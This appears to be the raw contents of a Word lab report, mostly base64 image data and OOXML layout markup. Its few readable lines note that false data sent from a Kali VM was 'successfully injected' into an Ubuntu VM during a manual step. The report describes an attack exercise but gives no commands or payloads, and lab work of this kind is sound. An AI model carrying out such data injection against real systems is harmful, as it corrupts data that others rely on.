W8f9qXEnl/9+/LqfXP7SlvLK+stWk02LRfMkksbaOP/AImf7v8AdyeZ/rPMr35y&#10;oYfDQxWKnyQmZYnOKdCusOfTjaxoOj30jyLZ2N5N99yUSST69zU1v4u026fy4LuCWT/nmk6Gvmj4&#10;zfEbUPB/g/xXrVnpk+q6t9ljkjkskjlkjeSzj/e+XJ/yzjkrD/ZV+KGs/ErwD4U1LxDBJ/bP2/y3&#10;vZYI4/tf+s/eRxx/8s69tZTfC/WFscizz/afYcn2+Q+wv7Zj/wCeclH9sx/885K+VvC/x38Sf2j4&#10;nuNUuPN06x1O4ijtpLSOOSSOPVfsf+j/APPx+7/1n/POTy/+elb2k/tD32v65eyWukwRWWmaLJqt&#10;3bfb/M8yOSOzuI/+Wf8ArI45JP3deAfVn0X/AGzH/wA85KP7Zj/55yV4DY/FTxJdfCP+2pn02y1a&#10;fxFcaLHfS/vLezj/ALRkt45JI/3f+rjrWi8ba74W8SS6Nez2viWOSSzt4L3zPs8nmXElx/rPLj/6&#10;Z0Ae0f2zH/zzkrJ8Tr/bujyWkf7qSR8fvK5n4Y6xd674H02+1Cf7Tez+Z5kn/bSSunoA+cPjB4Pn&#10;t/Edmn2iPiyX/wBGSUV1vxo/5Ge0/wCvJf8A0ZJRQBs+APiNoWl+A/DlpdXcltc2+mW8ckclpcfu&#10;5PLj/wCmdb3/AAs/w1/0E5P/AAEuP/jdUq+cdW/4KBfA/S7HULqHxdJq5sY/MeKy0+4k6yeWP9ZH&#10;5dAH03/wtHw3/wA/7/8AgJcf/G6P+Fn+Gv8AoJyf+Alx/wDG6+f/ANm39rbwx+05qHiaDwxpuoWN&#10;toQty8uopEnmfaPM/wDjde50AXf+Fn+Gv+gnJ/4CXH/xuj/hZ/hr/oJyf+Alx/8AG6ydSv4NLs7i&#10;7upPKtrePzJJK5i28b38V5H/AGv4autD064k8u3vrm4jk/eSf6uOSOP/AFfmUAd7/wALP8Nf9BOT&#10;/wABLj/43R/wtHw3/wA/7/8AgJcf/G6pVk+KPEcHhfR5NSnjklto5I45PL/5ZxySRx+Z/wBs/M8y&#10;gDo/+Fn+Gv8AoJyf+Alx/wDG6P8AhaPhv/n/AH/8BLj/AON1wWm/FDw9rWsWWm6df/brm4k8v/Vy&#10;R+X+7kk/9p1veH9Z/t6zkn8iS28u7uLfy5P+mdxJH5n/AJDoA3/+Fo+G/wDn/f8A8BLj/wCN0f8A&#10;Cz/DX/QTk/8AAS4/+N1yfjLXp/Dmj213BHHLLJf2dl+8/wCedxeR2/8A7Uo8C69P4t8D+HNdnjji&#10;udT0y3vZI4/9XHJJH5lAHWf8LR8N/wDP+/8A4CXH/wAbo/4Wj4b/AOf9/wDwEuP/AI3WbHdQS+XG&#10;kkcvmR+ZH+8/5Z1HHf2kt5LaJPH9tjjjkktvM/eRxyf6v/0XJQBrf8LV8L/9BJ//AAEuP/jdH/C1&#10;fC//AEEn/wDAS4/+N1SooAu/8LP8Nf8AQTk/8BLj/wCN0f8ACz/DX/QTk/8AAS4/+N1SooAu/wDC&#10;1fC//QSf/wABLj/43R/ws/w1/wBBOT/wEuP/AI3VKigC7/wtXwv/ANBJ/wDwEuP/AI3R/wALP8Nf&#10;9BOT/wABLj/43VKigC7/AMLP8Nf9BOT/AMBLj/43R/wtXwv/ANBJ/wDwEuP/AI3VKigC7/ws/wAN&#10;f9BOT/wEuP8A43R/wtXw3/0E3/8AAO4/+N1ga3fyaXZxzpHHL5lxb2//AH8kjj/9qVS8C69P4t8D&#10;+HNanjjiudT0y3vZI4/9XHJJH5lAHWf8LP8ADX/QTk/8BLj/AON0f8LP8Nf9BOT/AMBLj/43VKvD&#10;tS/alsLXxBq2mweGtSktrC/k06TUrm4t7ey+0R/8s/Mkk8uuatXp4f8AiHNXxVPD/wAQ9+/4Wr4b&#10;/wCgm/8A4B3H/wAbo/4Wr4b/AOgm/wD4B3H/AMbrx/4Z/HKD4jeJJNF/4R7UtIk+wSajb3N95fl3&#10;EfmeX5kckf8ArP8AWV6nWtOpCpT9pTNaNaGIp+0pl3/haHhr/oJSf+Alx/8AG6P+Fn+Gv+gnJ/4C&#10;XH/xus25uo7W3knnk8qOOPzJJK4OP406Fdah5EEc8sfmf8fNdsKNSpT9pCBw43NMLgXTWKnyHp3/&#10;AAtXwv8A9BJ//AS4/wDjdH/Cz/DX/QTk/wDAS4/+N1m211HdW8c8Enmxyf6upa5j0U01dHFfF7S/&#10;APxk0+ytNX1m6to7SSTy/s1vcf8Axv8A6Z1X8I6D4M8Jahp1xD4knkt7D95HbfYJI/8Aln/1zrW8&#10;bfEvw18ObP7X4h1aCx/55xy/6yT/AK5x1k/Dv43eD/ihH5eiatH9t/5aWNz+7uf+/de1CtmH1X2c&#10;FP2J4s8Nl1TFe0qOHOdxqXjfwnqn7z+0p4pP+ekdnJ/8bqPTfGXhPS7jz/7Wnluf+eklpJ/8bqzV&#10;LW9Uj0bR9R1J4/MjtLeS4kjj/wCmcdeVTp+1qezR7ZFfeI/CF1b3EaatPbSSSeZ5n2STzP8A0XVP&#10;7V4PutD1HSb3Wbq+tr+Py5JJLSTzP/RdeT6b+1po2qR74PD2qyR+Z5f/ACzr0r4d/EGD4g6fe3dr&#10;aT2PkXH2eSO5/wBZXt4nJcxwEPb1och5Ec0wOIr/AFOE/fOY0z4VfCfRdTtruGeS2lt/+Wltb3n/&#10;ALU8yvQfGWseEPGVnZR3WtX1rb28nmf6NbyR+Z/5DrSrN1bxHpug+X/aN3HbeZ/q/Mrx8Vmc6a+t&#10;Yuv8H25ndQy6hyfV8PT+Mk8L6z4F8JR3H9lzyeZcf8fFzJb3Ekkn/kOl1Lxl4av7ySf+2p4vM/5Z&#10;fZJP/jdWLG6g1C3jngk822k/eRyVLXEsXTxP7xVPaHT7D6t+79nyGbb+KPDVreRzvrs8vlyeZ5f2&#10;CT/43XF33gf4T3+oXN3JBa3MlxJ5kklzplxJJXo1cfqXxf8ABGlxyef4o0rzY/3ckcd3HJJ/37r0&#10;sLPFU6n+yc//AG4ctehQxH+8QKtloPw60bQdV0yyvvsMWpf6z7NYSRxx/wDkP/pnXCR/AL4XWtxH&#10;IniHUfMj/ef8elxXrfh/xloviiS9j0u/jvpLPy/tEcf/ACz8z/V1tV0wzHMcJUqLnnA562V4LEez&#10;54Q9wwNWvvBGsaPothe6tPL/AGTJHJHJHaSfvPL/AOen7uvKvil8C/hx8Uobmzl8XatommSlyLPT&#10;rSTKF45I5D88cn/LOSSvb5JY4vK3yRxeZ+7/AHlcP4y+Mnhvwb4gttFuriS51a4/1ltbf8s4/wDn&#10;pJXg/wBkwx1Tn9hz1BYyphMPDnxRo+JP+EL8SW9t/wAVDfW1zHbx2/mR2kn7yP8A791J4F/4QjwH&#10;JvTWrq+uPL8uOS5tJP3cf/fut+xukv7O2u4P3sdxH5kdWauvS9vyLEfY+D+4aU8Dg3L6xTh755zJ&#10;4b8Hy/Iniy7+zxyfu45NMkk8v/yHW94Tk8H+HZNR+1a7Jq8V3B9nkjubCTy/L/791jfET406F8Pr&#10;j7JP599qPl+Z9hto/wB5HHWj4A+KGi/Ea3uf7P8AMtr2D/j4sbmPy5I6+orUs0qYT21Tn5Djo5fl&#10;2Hr+0oQ/eG94g1nwD4kt7yOaSOKS7jjjuLmPT5PMkjj/AOWcn7v95H/0zqTw/r3gHw5odlpOn+XH&#10;p1pH5ccf2SST/ln5f/POr1Vr66gsLOSe6njtraOPzJJJP+WdfN7K7Pb3H3vizwDqel22m3sdrdad&#10;b+X9ntpdNkkjj8v/AFflx+XSx+MvAkUlzIiWsclx+8uJI9Mk/ef9dP3deSR/tLeHrrVPIgsNSudO&#10;8zy/7Sjt/wB3Xq9jfwapZx3drJ5ttcR+ZHJWFHE0K7tCZ6OMy3FYHkeKhyGt/wALR8N/8/7/APgJ&#10;cf8Axuuc8UfEbSb/APcQXcn2b/lp/o8n7z/yHWtXJ+MviX4X8Bx/8TvWrGxufL8z7FJcRx3Ekfmf&#10;8867KdCpiKns6Z5VSpTpw9pUD4X+NtF0aTxf9qnntvtevSXFv5lpcfvI/Lj/AHn+rruf+Fn+Gv8A&#10;oJyf+Alx/wDG68x0T45+GteuLKCyknl+1yeXHJ5f7uvQa1r4Wvg/48OQyoYqhi/4E+cu/wDCz/DX&#10;/QTk/wDAS4/+N0f8LP8ADX/QTk/8BLj/AON1mV534t/aH8CeA/Hlt4P1fWpLbXrjy/LtvslxJ/rP&#10;9X+88us6dOpU/hms5wp/Ger/APCz/DX/AEE5P/AS4/8AjdH/AAtHw3/z/v8A+Alx/wDG6zbeWO6j&#10;jkgk82OpayNC7/ws/wANf9BKT/wEuP8A43R/ws/w1/0E5P8AwEuP/jdYtzfx2ske/wD5af8ATOT/&#10;ANp14d4y/av/AOENuNR+2+BNclsrC4kjkvraS3kj8uOT/Wf89KDWnTqVP4dM+i/+Fn+Gv+gnJ/4C&#10;XH/xuj/hZ/hr/oJyf+Alx/8AG6yba6+32cc6f8tI/MqzQZF3/hZ/hr/oJyf+Alx/8bo/4Wf4a/6C&#10;cn/gJcf/ABuqVFAF3/hZ/hr/AKCcn/gJcf8Axuj/AIWf4a/6Ccn/AICXH/xuqVFAF3/hZ/hr/oJy&#10;f+Alx/8AG6P+Fn+Gv+gnJ/4CXH/xuqVFAF3/AIWr4X/6CT/+Alx/8bo/4Wf4a/6Ccn/gJcf/ABuq&#10;VFAF3/havhv/AKCb/wDgHcf/ABuj/hZ/hr/oJyf+Alx/8bqlRQBd/wCFo+G/+f8Af/wEuP8A43R/&#10;wtXwv/0En/8AAS4/+N1SooAu/wDC1fC//QSf/wABLj/43R/ws/w1/wBBOT/wEuP/AI3VKigC7/ws&#10;/wANf9BOT/wEuP8A43R/wtXwv/0En/8AAS4/+N1SooAu/wDCz/DX/QTk/wDAS4/+N0f8LV8L/wDQ&#10;Sf8A8BLj/wCN1SooAu/8LV8L/wDQSf8A8BLj/wCN0f8ACz/DX/QTk/8AAS4/+N1SooAu/wDC1fC/&#10;/QSf/wABLj/43R/ws/w1/wBBOT/wEuP/AI3VKigC7/ws/wANf9BOT/wEuP8A43R/wtXwv/0En/8A&#10;AS4/+N1SooAoeMfE3g/xt4XvdGutWnitruP95JFBJ5n+s8z/AJ515d4b+F/gHwnpklhpfii6traT&#10;/Wf6BJ5n/fzy69gor0KOPxOHp+zoTPNxOX4XF1PaV4c4XPjzwfdafHaPqUnlx/6uT7JJ/wDG6zbb&#10;xR4Thk8yfWp7qOOT93H9kk/+N1pUVwHo9LGTqWseBNT8Qf2zNdzy3scflx/6PceX/wB+/LqPSde8&#10;L6XqEd3/AMJDdXPl/wDLKS0k/wDjdbVFaSqVJ6TM4U6dPWB5PqXwq+EmqXtxdzSSSyXEnmeZJb3n&#10;mV6NH4i8Hx+E5PD0Gs3UVlJHJH5scEnmf+i60qhrepjMViOT2lT4Dlp4GhT9p7On8Zg+G/8AhXXh&#10;e8t7uG7urq9t4/Ljubm3uJPL/wDIdb+rePPDWqeX/wATaSLy/wDp0k/+N1LXOf8ACwfDUWqXumvr&#10;tjFe2H/HxbSXHl+X/q5P/biP/v5XPOtUxE+eobUKFPDw5KdMuyeI/DUsf/Iwz/8AgBJ/8brF8XaL&#10;8NvGWqR32oSQX1zHH5f+k2FxJW1pvijRdUuPIstWsb65/wCedtcRySVHq3i3TdB1C3sLqSf7bdxy&#10;XEcdtbySfu4/Ljk/1f8A10j/AO/lOhWqYep7SnU5DSpRp4in7OrTOf8ADHhv4ZeE9aj1GyEFlcQf&#10;c+xWFxHXGat8EfhlrOoXF/P4hvvMuP8Ap0uK9F/4WFpP/T1/4ASf/G6s6b4y03VNUjsIPPiuZI5J&#10;I45LSSP/AFf+s/8ARldsM0xtOp7SnXnznFPK8FUh7OpQhyFLwnD4E8L+B7jwumtXdzp0/wD06SeZ&#10;H/5DrmPHPw5+H3jHQItJg8Q32kR/ZPsd3c21pJ5k8fl+X/zz8vzP+mlenXV1BY28k888dtbR/wCs&#10;kkk8uOOq9trNhfx+Za38FzH5fmeZHJ5n7uvExuFo5hU9ri4c7On6rQ9n7PkOG8BeDvAfgX4a23g2&#10;DxLqN9Hb31xqEd7c2n+keZPJJJJ/yz8v/lpJVnw/oPgjRdY+3T+Jb7U/3nmfZpLSTy/M/wC/ddhJ&#10;qlhFeR2j3cEd7J+8jtvM/eSVdrSpQhiKMMLU+CBl/Z+E5/aez9847xRD4T8Ravc6kniS6svP8vzI&#10;/sEkkf8Aq/L/AOedV/D+n+E9B1TTrv8A4Si6ljtJPMjtvsEkcf8A6LrtJJY4vM3yRxeXH5lV5NZs&#10;ItP+3vf2v9nf8/P2iPy/+/let9fxKp+yU/cOb+yMF7f6xye+WJPFvgSXy5H8jzLeSS4t5PsEn7uS&#10;T/WSR/u/9ZWL4Tk+GvgmO8TT5P3t9/x9yXNpJJJcf+Q/+mda0V1BLHHIk8csdx/q/Lk/1lWa849c&#10;P+E88GeXex74PLu/3k8f2CT/AEj/AK6fu/3lVrHxH8PdLktvstpY232SPy7fytMkj+zx/wDTP93X&#10;mX7R/wC0Dpv7N/gCLxXqmk3Wr20l/HZfZrLy/M8yTzP+en/XOvA9Q/4KUQabZvdXvwa8dWNnCu97&#10;i6tPKjj989MUAfbVt8S/CdrH5cF35Ucf/LOO0k/+N1X1b4q6L9n8uyu5PM/56eRJ+7/8h1ynwv8A&#10;HcHxO+Hnh3xfZWk9jb61aR3kdtcf6yPzK6ugDy7x14y0lr2wEE0jRi1wCtvIR/rZO/l0V39n/wAg&#10;2w/690/lRQBpV+FMIu9B8PeLf7T+E1jpeyCL5LmDVI93+kx/89Liv3WooA/PD/gk3rtnrF78Ujae&#10;H9O0RUj0vf8A2c9xJv5uf+fiSSv0PrLtNG0vSL6a6s7C2trm+/1tzDbIkk3+/jrWpQBx/wASNU/4&#10;lf8AYVrBJfa1q3+j29tH/wAs/wDp4k/55xx0a3o2teLrO2sNRgsbGy+0W9xcSW13JcSSeXJ5nl/6&#10;uP8A5aR11H2SCOV7ryI/OlXyHm2fPs54/wDHzVigArhvjHFHL4Hkkn8jyo9T0+48uSOSTzPL1C3k&#10;8vy445JP3n+r/wBX/wAtK7migDyjRNe03WfFnhxIPDX9kSR3ckn2mTSNQt/+Xe4/5aSWUcf/AJEr&#10;e+ENhBYeE72O1j8qP+29Y/8ATjcR13NFAHH/ABW/5Fey/wCw1o//AKcLeo/g5/yR/wAD/wDYB0//&#10;ANJ466PVtFtNes4rS9j82NJoLr/gcTpMn/j8SH8KTQ9HtPDuhWGlWMRjsdOhW1hj3nhIotiUAeSa&#10;TYeJb+PwxHa6TqWkfYNIt9Ou5JI445P+Piz8zy5P+eflx3FUrnR/G+l+PL2/SDVf7OktPsUdzY+X&#10;Jc+ZHcXn2eSTzP8AWRxxyR/+Q/8AppXvVQ0Ac94Aur+68Nxyajpt1plz5kn+jX1xJcSf9dP3ldPR&#10;RQAUUUUAFFFFABRRRQAUVDU1AGL4t/5BVt/1/wBn/wClEdYvwX/5I/4H/wCwDp//AKTx11d5YR6i&#10;oim5RJIpP++Jd4qv4f0W08O6HYaVYx+XY6dClrDH6JFFsQUAaNfOvwyt/DPxS1rxP4J13UrLStG0&#10;rxLql5qWkyzxwPrrvcyfZ5Oofy49n44j9K+iqwp/CPhzUZJrq60LTriZv9bNNZo7vXDXo+09mcOK&#10;w3t+Q878E+J9Jj+KVv8AD/TriHWP+EU0m8jg1RHjk/0SSWz+zweZ/wA9E+5/2zr2Gsmw0PRtDmc2&#10;GlWVjNL+7eS1tkStCtaMPZwNMLRlCDhM4z40aXqWsfCvxFaaR5n9oyQeZH5f/LTy5PMkj/7918gf&#10;DP4oeFNL0y90LW0fQ9eju/Mj1KS3kkjkj/55/u/+WlfeVZ/9k6T9u/tb+zrX7f8A8/P2ZPN/7761&#10;9HhMypwwNTAzh8Z4GZZLTx+I9u/5OQreCYvK8J6T+8k/eQeZ+8j8uT95+8/1db9FFeDGnCnDkgfS&#10;YenCjT9nA+dPjJrGm6D8VPt17oWj65/okfmW2rWEdx5kf/bSofCvivwf4m+IWhSaP4Q0Hw/IlxH5&#10;cVlYwRyf9/I46+kaK+xhmlL6tyfV/f5OX4j4mWS1J4mc/rHuc/P8IVgfEj938P8AxP8A9gy4/wDR&#10;clb9ef8Aiz4weH/D+pTaXf2l/dO0RMu2JGjdX6jBkr57BSbxFNxgfa1qtOjDmqS5YeR8n/Dj4teH&#10;/Cun6PYwajc28dj/AKW8n2fzPPvpP3f2jy/+edvH/q6+j/2cfEUfiq18XapHI8kV1q0knmSf8tKy&#10;v+FqfDL/AKE//wAplv8A/HK09P8Aj54J0GGVbDRr+xhf/lna2cCf+1K/Qc3zShmOHqQw9CUJz63i&#10;z59/U/rcK9Nr7mex1znj/WZNB8N3OpQWkd9Jbx/u4637y4Sxt5Z334jSR2EZxmvLf+GjvDf/AD46&#10;p/34i/8Ajlfl1fL3mEPY1I80Pd3PdnmFPAq/M4z8jU8N+KNdl8SW2m6pYWsUdxafbI5LHzP+ekde&#10;hV5T/wANHeG/+fHVP+/EX/xytnwt8YtG8YX0lrZwX8JSHz91xEh5/CT/AG6jB8Pyy/nnRhy/1/iI&#10;/tjDYiUKM6rlP0/+1O9r4Q+JHhHxR4c8P3NrqPhOSL7RrUlxBqUdhHJJJH/zz8yP95X3fUNe5l2a&#10;SwFT4DoqQ9oeKfAHS/FH/CUeI9S1SOeLSbu3t/s/mfu/Mkr3GiiufHYxYyv7fkFCn7M8++NHhfUv&#10;GXhOPTdIsILnUZLiPy7m5uJLf7J/08V896tosnw11LWdG8Q6P/aXiHUn+0QeJ98knmR/88/3n/XO&#10;vsWo3s0vPJ81I5tsnmReYn3K78DnEsvfsqsOeB89meQRzJe1pT5Jmb4S/wCRT0Xf/wA+Fv8A+i61&#10;qKK8mpU9pU9ofQ06fsqdOmeFa349sfg/8TvE2pavpN9czak9pJa3ttAjx/Z4/wDWW/z1Z8FeIE+K&#10;XxQ0/wAV6TaXVjbWOlfY9SuLmCO3+33H/bP/AD+7r2O4tbfULMx3UEdxB/zzmTf/ADqSOJLOCIQx&#10;JDCn/LOMV9TPMl9Vf7p8/Jy8/Nptb4TP2P7wlri/i9oN/wCI/hvrVhpf/H7JH+7j/wCen7z/AFdd&#10;pRXxdSHtKfIzWcOeHIj5J+FOsyX/AIs06Cxv76xjsLT7PcaJ5cnl/wCr8uT/AKZ/6yvqjR45I9Lt&#10;9/Enl1L9gt/NluvJj85/+W2z56s15cIzx2OhipVU/Zx5I2jy+6Vh1Vw2GnQrT56k583MFfPf7Qt9&#10;o/hPXNR8UeKvAz+KNAt7DT449SjEf+if6RcRyR/89P8AV3Ef/bTy69x8Sa9beGNEl1W7jmlto/L3&#10;R25Ac/vNnU153/w0h4b/AOfDVf8Av3H/APHK+vwCqUJ+2hHm+djx8biMM/3FSTj8j4Z+FXxQ+3/G&#10;DwxBBB9mtrvxFb+XHFB5ccfmXlfp7XmulfHzw/rF5HBDZ6lGX7yRRn/2pXbaVrUWseZ5Mbx7P+eh&#10;zXoZzjquYezm48vIc+V0sPhfaQpVHLn8i9Xw18RPhz8Qvh94d8T2aeMEuZY7+3j0HUpI/wDiY2Fv&#10;J9o+0W9vJ/rPL/1f+r/d/wDXOvq7xd8YtG8HX8dreQX85eDz91vEg5/GSsGb9oLwm1xDPLpWoyXK&#10;/wCqk8iP5P8AyJXBho16fvwijrrYrCOXsalRxn5I6f4OaDd+F/hf4c0nUZJJbm0sI45PM/1n+rrt&#10;K8o/4aQ8N/8APhqv/fuP/wCOV6VDrEc2jx3wRxC8fmdf3m3y9+M1xYijUj+8rROqji8NW/d05OXJ&#10;30Pnz9r3xld+DdQ8F3dldz20kkeoR/u5PL8z93HXxXY+LZ/MudWvfEMksclvJHd6bcySSSXEknmf&#10;8s/9XX3xq3x08Ba+kMWqeH7zUkX/AFX2qygfZ/5EqO18ffDO6uLeMeC4A07xxk/2RZ0p5bX35UfW&#10;4DijD4DBQowgufn7v/5E9j0X/kD6d/17x/8AourtZWla1BrEwhhiaMInmfvFB/rWrWUoTp/GfOqt&#10;HERdSAUUUVmUFFFFABRRRQAUUUUAFFQ1NQAUUUUAFFFFABRRRQAUVDU1ABRRRQAUUUUAFFFFABRU&#10;NTUAFFFFABRRRQAVx+peA/8AhKNUubvXrueWOOT/AIlltbXEkf2T/pp+7/5af6z95/2z/wCenmdh&#10;RQBm+H4tTtdHtoNXnjub2P8AdyXMf/Lx/wBNP+mdfJ/7X3wb+KXiy6ubT4cXRsrW/CXE96PMjljl&#10;8z5445LePzOsccn7z/npX2FRQB8wfsr/AA/8ZeCvBvhTQ/FsV9eeIbDU7y9v9aukkljnt5I7iOOP&#10;7RJ+8/1kkf8A37r1nx/5kXjjRZ/t/wDZkf8AYmqW8d9JJHHHHJ9o0/y/3kkckf8Ayzk/5Z/8s69G&#10;ooA81k1mD/VprWjyx+XHH5kmp2//AMj1Joksd14807yNSj1f93qEnmRyRyfZ45JLfy4/3ccf+f8A&#10;lpJXo1FAHH/F7S7vWPhn4jsNOgkub2e3/dxxx+ZJJXlviTwH4o1T7TruiQTxXtv4d+xfZrmCO3+3&#10;xySXHmW/lx/6uT95HJH/ANNI46+gqKAPH9N0bWtL8WWUf9iyXNzJqf2i41aS0jkj+x+X+7j8z/WR&#10;yR/6uvYKhqagDz7xJoP9l+JNa1210KTXJLjRJLeS28zzPtEnmfu4/wB5XJ23gj7V8P8AyNQsNY/e&#10;Xf22T+zbeO3kjuPtH2j93ZyeZH5f/kSvbaKAPLLHwlq114k+Gutajaf6bYWFxb38kf8Ay7+ZH/zz&#10;/wBX/wB+69ToooA+Zf8AgoV8MfFHxd+A1toXhHRZ9c1VNat5zbW0kcf7tIpP+elfmTZ/CXxn8VNa&#10;1PQPA/w51iLUdKaSHVYL5LSSW3f+4ZPs0HluMPx1r90KbDYxLNO0Uccc0v8ArZNn36APM/2a/C+p&#10;eDfgB4D0LWrSSx1Ww0m3t7u2l/5ZyeXXp1FFAGbZ/wDINsP+vdP5UUyy/wCQXYf9e6fyooA//9lQ&#10;SwMEFAAGAAgAAAAhAFdc56TdAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C/2EZ&#10;wZvdJLZiYzalFPVUBFtBvE2TaRKanQ3ZbZL+e0cvenkwvOG972WrybZqoN43jg3EswgUceHKhisD&#10;H/uXu0dQPiCX2DomAxfysMqvrzJMSzfyOw27UCkJYZ+igTqELtXaFzVZ9DPXEYt3dL3FIGdf6bLH&#10;UcJtq5MoetAWG5aGGjva1FScdmdr4HXEcX0fPw/b03Fz+dov3j63MRlzezOtn0AFmsLfM/zgCzrk&#10;wnRwZy69ag3IkPCr4i3nicw4GFgskznoPNP/6fN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6m5dDTQQAAJUPAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9j&#10;LnhtbFBLAQItAAoAAAAAAAAAIQDTqQbjsi8BALIvAQAUAAAAAAAAAAAAAAAAALYGAABkcnMvbWVk&#10;aWEvaW1hZ2UxLmpwZ1BLAQItABQABgAIAAAAIQBXXOek3QAAAAUBAAAPAAAAAAAAAAAAAAAAAJo2&#10;AQBkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAAAAAA&#10;AACkNwEAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAACVOAEAAAA=&#10;">
                <v:rect id="Rectangle 3361" o:spid="_x0000_s1272" style="position:absolute;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661E57B5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3362" o:spid="_x0000_s1273" style="position:absolute;top:2026;width:2014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64C91B98" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Doing the manual Part</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3363" o:spid="_x0000_s1274" style="position:absolute;left:15151;top:2026;width:56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05FD049A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3364" o:spid="_x0000_s1275" style="position:absolute;left:59448;top:36125;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409EC2CA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3376" o:spid="_x0000_s1276" type="#_x0000_t75" style="position:absolute;left:383;top:3890;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w9xQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5Qm91Y1VrEZXaQWlHjw0inh8ZJ/ZYPZtyG5N8u/dQqHHYWa+YZbrzlbiTo0vHSsYDRMQ&#10;xLnTJRcKTsft6wyED8gaK8ekoCcP69Xz0xJT7Vr+pnsWChEh7FNUYEKoUyl9bsiiH7qaOHpX11gM&#10;UTaF1A22EW4r+ZYkU2mx5LhgsKaNofyW/VgFm/P8E3eHWU/U7yeZ27fm4gqlXgbdxwJEoC78h//a&#10;X1rBePw+hd838QnI1QMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB0jkw9xQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;">
                  <v:imagedata r:id="rId86" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3377" o:spid="_x0000_s1277" style="position:absolute;left:256;top:3763;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OlixAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC36H8ARva6qVVapRZFfFo/9AvD2aZ1tsXkoTbf32RljwOMzMb5jZojWleFDtCssKBv0IBHFq&#10;dcGZgtNx/T0B4TyyxtIyKXiSg8W88zXDRNuG9/Q4+EwECLsEFeTeV4mULs3JoOvbijh4V1sb9EHW&#10;mdQ1NgFuSjmMoh9psOCwkGNFvzmlt8PdKFg1w7O/7Da3yeBqdTXK/jjeHZXqddvlFISn1n/C/+2t&#10;VhDH4zG834QnIOcvAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALrc6WLEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5461DF16" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the last item on the UBUNTU VM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B83E8F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">After adding the data from kali VM we can see false data got successfully injected </w:t>
      </w:r>
    </w:p>
